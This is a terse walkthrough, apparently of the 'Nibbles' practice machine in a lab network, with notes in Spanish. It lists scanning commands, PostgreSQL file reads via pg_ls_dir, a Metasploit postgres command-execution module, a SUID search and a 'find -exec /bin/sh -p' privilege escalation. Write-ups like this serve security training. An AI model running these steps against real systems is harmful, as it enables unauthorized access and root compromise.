nmap -A -p- -oA nibbles 192.168.137.47 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA nibbles 192.168.137.47

nmap -sU -O -p- -oA nibbles-udp 192.168.137.47

nikto -h 192.168.137.47:80

Pasted image 20210925173359.png

Pasted image 20210925173522.png

whatweb http://192.168.137.47

Pasted image 20210925173601.png

psql -U postgres -p 5437 -h 192.168.137.47

Select pg_ls_dir('/home');

Pasted image 20210925174635.png

Select pg_ls_dir('/home/wilson/local.txt');

Pasted image 20210925175046.png

Trate de hacer un query para que me diera un reverse shell pero no me funciono.

Pasted image 20210925175958.png

use exploit/multi/postgres/postgres_copy_from_program_cmd_exec

Pasted image 20210925183105.png

Seteamos el LHOST,LPORT RHOST, y RPORT

Pasted image 20210925183131.png

Lo corremos con run

Pasted image 20210925183156.png

echo $PATH

find / -perm -u=s -type f 2>/dev/null

Pasted image 20210925183303.png

find . -exec /bin/sh -p \; -quit

Pasted image 20210925183335.png

boxes

copyright©2022 Cu3rv0x all rights reserved